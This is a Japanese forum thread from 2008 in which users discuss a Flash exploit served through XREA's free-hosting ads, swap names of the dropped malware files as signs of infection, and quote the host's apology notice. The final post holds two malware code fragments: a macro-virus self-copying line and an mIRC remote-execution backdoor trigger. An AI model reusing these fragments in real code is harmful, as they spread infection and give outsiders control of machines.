XREAの広告にAdobe Flash Playerの脆弱性をついたスクリプトが混入

このエントリーをはてなブックマークに追加
71 人造人間20号(久留米):2008/06/16(月) 01:08:19.35 ID:fB00cNxL0
何が仕込まれちゃうの?おせーて
72 シェンロン(秋田県):2008/06/16(月) 01:26:47.32 ID:hfSP8fSk0 BE:314007277-PLT(12346)
73 シェンロン(秋田県):2008/06/16(月) 01:29:52.25 ID:hfSP8fSk0 BE:230699366-PLT(12346)
また中華のMMOのアカウント盗むやつっぽい
74 イチオッツ(横浜):2008/06/16(月) 01:34:06.82 ID:344ASz6fO
時代はTok2とぶっとびネット、あとフリーなんとかシアター
75 ブラ(巣鴨):2008/06/16(月) 04:25:01.22 ID:kLlgPTDG0
ばかやろう、俺のサイト経由でも感染してんじゃねーか。
avast!でモロ引っかかってやがったぜ。
でも、独自ドメインなのに訪れんの俺と家族だけなのよねー(T◇T)。
76 ブリッグ(佐賀県):2008/06/16(月) 04:26:00.07 ID:rkxvVfbi0
>>1
ご激怒って何よ
77 アン=カーミス(長野県):2008/06/16(月) 04:27:44.23 ID:ghzOSyds0
ニコニコ死亡ってことですね。わかります。
78 キ・シュツ(コネチカット州):2008/06/16(月) 04:33:09.76 ID:iPAlhppmO
>>75
晒してくれたら遊びに行くよ。
79 ジュダック(巣鴨):2008/06/16(月) 06:50:04.87 ID:XDiS5/Nx0
これなー
AVGがorz.exeってやつを検出した。これはすぐ隔離したから大丈夫だったんだけど、
念のためにスキャンしたらtaa[1].gifってファイルが隠れてた。
こっちには反応しなかったんだよな…
80 ヘンナナ・ガレ(岡山県):2008/06/16(月) 08:13:23.60 ID:A92Ofxyw0
taa[1].gif ってなによ
81 歓歓(四国地方):2008/06/16(月) 08:36:55.55 ID:uTpWdN0f0
>>79-80
脆弱性突いたswfファイルが呼び出すのが
taa.gif
中身は実行ファイルになってる
82 ヒソクサリ(埼玉県):2008/06/16(月) 09:49:43.64 ID:QvlekL3t0
この脆弱性ネトゲでえらい被害出てるよ
昔はゲーム内BOT程度だったんだけど
どんどんエスカレートしてアカハック、今や完全に犯罪

そのうち銀行口座とかやり始めんじゃねーの
83 ゆうさく(巣鴨):2008/06/16(月) 10:09:38.11 ID:M9NeOLtM0
糞レア
84 バージ(千葉県):2008/06/16(月) 11:15:07.12 ID:Cf7uNU1P0
ネットゲームのパスワードだけしか盗まれないと、安心していたら
銀行のパスワードを盗まれたでござるの巻
85 バビディ(愛媛県):2008/06/16(月) 11:40:00.14 ID:2DWXrxRx0
ネトゲのパス抜いても日本の警察は中国には手出せない
それを知っててやってるんだろう
銀行のパス抜いたらさすがにやばいんじゃないかな
86 オムル・ハング(巣鴨):2008/06/16(月) 11:51:11.31 ID:QqoNxApi0
taa[1].gifで検索したけど出てこなかった。Adobe Flash Playerが最新だったもより。
87 シェンロン(東北地方):2008/06/16(月) 13:47:19.84 ID:xSZoMAMi0
放置ワロタw
xrea使ってるサイトはちょっとお高くとまってたりするのが多いから、
ザマーみろだw
88 バビディ(愛知県):2008/06/16(月) 13:53:09.09 ID:trh4GXVj0
javaスクリプトとか切っておけよ・・・
89 大ババ(巣鴨):2008/06/16(月) 14:49:12.18 ID:M898uhht0
ALEXAツールは正直ウィルス。
海外のサイトまわってると感染する。
90 シェンロン(東北地方):2008/06/16(月) 16:40:13.17 ID:xSZoMAMi0
・グーグルに報告してインデックスを削除してもらう
・レジストラに報告してxrea.comドメインの停止

これが必要だろ
91 ロウル(巣鴨):2008/06/16(月) 17:11:46.85 ID:7Fc/Gk8d0
昔、上位レジストラからxreaのドメインが停止された時の理由が
フィッシングサイトを消さなかったからというものだったよね。
そして今回はトロイのバラまきを猛々しく続けるxreaなわけだが、
また制裁でドメイン停止とかされないのかちょっと心配。
92 パオロ・カシアス(巣鴨):2008/06/16(月) 17:24:27.88 ID:OGWVNeYK0
XREAって何て読むの?サイゼリア?
93 チャー・フイター(新潟県):2008/06/16(月) 17:36:48.48 ID:IU00cLNk0
>>92
エクレアってずっと読んでた

エクスリアだって
94 パン(東日本):2008/06/16(月) 18:02:35.58 ID:M4s0v9ug0
>>92
「クソりゃー」が正解です
95 ベエ(巣鴨):2008/06/16(月) 20:04:40.61 ID:EV5WB0t+0
で、まだ直ってないの?
この会社はペーパーカンパニーか何かなの?
96 ドーシタイン(鳥取県):2008/06/16(月) 20:06:41.97 ID:y+j7w3iz0
>>75
今回のウィルスはavastでも防げたの?
97 マージ・レスキン氏(巣鴨):2008/06/16(月) 21:59:24.39 ID:l9DLWE5v0
>>95
え?直す直さないじゃなくて
広告Flashに運営が埋め込んでたって話でしょ?
98 通 報(巣鴨):2008/06/16(月) 22:00:29.84 ID:fvqmo2GG0
それよりアクセス解析のエラー直せ
金払ってるのに詐欺だぞ
99 ブルマ(福岡県):2008/06/16(月) 22:26:04.45 ID:tr7wcplP0
>>97
XREAの無料広告は5つの広告サーバーからランダムで選択され表示されるんだが、
うち1つが汚染され、そこ経由の広告が表示されると埋め込まれたJavascriptが自動的に実行>害swf実行>ウィルスexeダウンロード
という流れらしい。
100 マーカー・クラン(埼玉県):2008/06/16(月) 23:19:01.73 ID:GCaex3vB0
ぱっとXREA
101 皇帝ハーン(埼玉県):2008/06/16(月) 23:23:34.26 ID:0EeyYoad0
>>1
激怒に御は使わない
102 カイ・シデン(秋田県):2008/06/16(月) 23:28:41.34 ID:v9wfopwy0
自宅鯖やってるけど全然使わないで広告入りのレンタル鯖使ってるわ
103 ニンキーニ・シット(大分県):2008/06/17(火) 10:28:58.43 ID:bn+y9/5O0
ウィルス感染しているかの確認方法 まとめ

97 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/06/16(月) 04:25:38 0
>>96
とりあえずorz.exeとi115.swfがPC内に紛れてないか検索しとけ、今回の犯人
あとカスペルスキーのオンラインスキャンお勧め

102 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/06/16(月) 07:49:13 0
>>97
taa.gif(orz.exeのドロップ前の名前)、
sonb32drv.dll(orz.exeがドロップするトロイ)も追加で。
104 スレチョウ副大統領(山口県):2008/06/17(火) 11:09:54.38 ID:bHnPS5260
105 アムロ・レイ(巣鴨):2008/06/17(火) 12:55:03.06 ID:6dOgzPF30
                _∧_∧_∧_∧_∧_∧_∧_∧_
     デケデケ      |                        |
        ドコドコ   <      倒 産 ま だ ー ?     >
   ☆      ドムドム |_ _  _ _ _ _ _ _ _ _|
        ☆   ダダダダ! ∨  ∨ ∨ ∨ ∨ ∨ ∨ ∨ ∨
  ドシャーン!  ヽ         オラオラッ!!    ♪
         =≡= ∧_∧     ☆
      ♪   / 〃(・∀・ #)    / シャンシャン
    ♪   〆  ┌\と\と.ヾ∈≡∋ゞ
         ||  γ ⌒ヽヽコ ノ  ||
         || ΣΣ  .|:::|∪〓  ||   ♪
        ./|\人 _.ノノ _||_. /|\
         ドチドチ!
106 ブラクラ中尉(沖縄県):2008/06/17(火) 14:30:22.96 ID:il68LN000
xreaざまあw
広告踏んだかもしれない俺も涙目w
107 バンマス(神奈川県):2008/06/17(火) 16:51:17.21 ID:5/3m6m7k0
Jane Styleがxrea.comだけど大丈夫なの?
108 ベジータ(東北地方):2008/06/17(火) 19:03:39.16 ID:qyGg9OhF0
無料ユーザー向け広告配信サーバーの不具合について
下記内容で、広告配信用キャッシュサーバーで不正なファイルが設置されている不具合が発生しておりました。

○内容:
現在、5台を広告配信用キャッシュサーバーとして運用していますが、その中の1台で6月初旬から不正なページが設置されておりました。
このため、無料ユーザー様のページ内に自動挿入される広告にて不具合が発生しました。アドレスは「imgj.xrea.com」となります。

○対応:
サーバーを初期状態に戻し復旧しております。

○原因:
外部委託し運用しているため、不正なページの設置が、サーバー外部からなのか、内部からなのか、どのようなページなのかなど詳細については、
現在も調査中となっております。わかり次第、追って、アナウンス、修正させていただきます。

○今後の対策:
コスト削減のため、外部委託で管理しておりますが、このため弊社側で、ログインができなかったなど、多々問題が発生し、多々ご迷惑をお掛けしました。

正当な理由にはなりませんが、無料サーバー部門については完全な赤字となっており、なるべくコスト削減を行い、長期運営を図るよう努力してまいりました。
現在もドメインのご利用のお客様を中心に新たにご利用が増加している状況にあります。
しかし、有料契約のお客様以上に頻発する規約違反への対応問題などで、コストは増加する一方で、かつ、管理における問題も発生する状況になっております。

ご利用のお客様にもご迷惑をお掛けするのは決して許されませんが、それ以外の外部の方にもご迷惑をお掛けする許されない状況
(迷惑メール、スパムブログ等々)が増えつつある事実があります。

8月にて無料サーバー開始から8年となります。今後の無料サーバー自体の方向性も含め見直しを図る所存です。

また、各サービスにおいて、再び、自社で管理する体制に順次戻していく予定です。
この度はご迷惑をお掛けし大変申し訳ございません。
以上、よろしくお願い申し上げます。
ttp://sb.xrea.com/showthread.php?t=12839
109 キツネリス(巣鴨):2008/06/17(火) 19:25:10.28 ID:poalZBFs0
そういえばadobe flashの更新がこの間来てたなぁ
これ関連なのかな?
110 小和田 仁成(巣鴨):2008/06/17(火) 21:53:22.66 ID:KCc36l470
>正当な理由にはなりませんが、無料サーバー部門については完全な赤字となっており、
>しかし、有料契約のお客様以上に頻発する規約違反への対応問題などで、コストは増加する一方で、
なんだこれ 部活かなんかで運営してんのかよ
111 ムッシュ ロイ・キロ(愛知県):2008/06/17(火) 22:16:54.88 ID:kueASNkW0
Flash更新してないけどやばいの?
xreaのページなんてどこにでもあるしおそらく踏んでるし
バスター先生対応してなさげだし・・・
112 けんけつちゃん(東京都):2008/06/17(火) 22:35:30.73 ID:6p5NyS2Z0
>>111
感染してもPCへの破壊活動とかはない
オンゲのアカウント乗っ取られたり
(キャラクターの有り金持ち物下手すりゃキャラごと無くなる)
ミクシーやメッセの情報抜かれたり
(友人知人に親しげにウイルス送りつけて感染させたり)
する程度だから安心しろ。
113 ムッシュ ロイ・キロ(愛知県):2008/06/17(火) 22:57:55.85 ID:kueASNkW0
安心しろってウイルス送りつけて感染させるとかめっちゃ悪質だろうにw
114 けんけつちゃん(東京都):2008/06/17(火) 23:04:20.20 ID:6p5NyS2Z0
>>113
オンゲやってなくてミクシーとかメッセもやってなかったら安心ってことさ
ノートンの評価も危険度1だ

ちなみに俺はオンゲやっててFFなんてえらいことになってる
115 女尼女尼(愛知県):2008/06/17(火) 23:15:55.02 ID:u7Upq0Rn0
>>113
心配なら>>103を検索してみればいいじゃないか
116 管蟲(愛知県):2008/06/18(水) 04:06:29.70 ID:vslcIGK10
無料全部止めちまえ、ドメインと有料サービスだけやれよ
117 ヤコン(神奈川県):2008/06/18(水) 05:52:26.15 ID:MPsJSzVJ0
118 G.O.バーク(福岡県):2008/06/18(水) 10:28:05.85 ID:Q026oL1q0
>>116
ちょっwww勘弁してくれwwww
119 ゴル(巣鴨):2008/06/18(水) 11:05:24.46 ID:qDoIn2Sh0
>>116
何で無料やってるんだろうなw

暇つぶしか?

有料優良ユーザーにとっちゃ負荷増えるし困ったもんだろうにw
120 ナーラ・クルーナー(神奈川県)
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-